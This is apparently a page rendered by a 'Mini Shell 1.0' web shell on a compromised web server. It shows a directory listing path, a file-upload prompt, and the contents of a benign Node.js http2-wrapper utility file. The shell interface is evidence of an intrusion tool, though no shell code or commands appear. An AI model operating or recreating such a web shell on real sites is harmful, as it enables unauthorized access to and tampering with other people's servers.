HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991111/root/usr/share/nodejs/http2-wrapper/source/utils/
Upload File :
Current File : //proc/1991111/root/usr/share/nodejs/http2-wrapper/source/utils/js-stream-socket.js
'use strict';
const stream = require('stream');
const tls = require('tls');

// Really awesome hack.
const JSStreamSocket = (new tls.TLSSocket(new stream.PassThrough()))._handle._parentWrap.constructor;

module.exports = JSStreamSocket;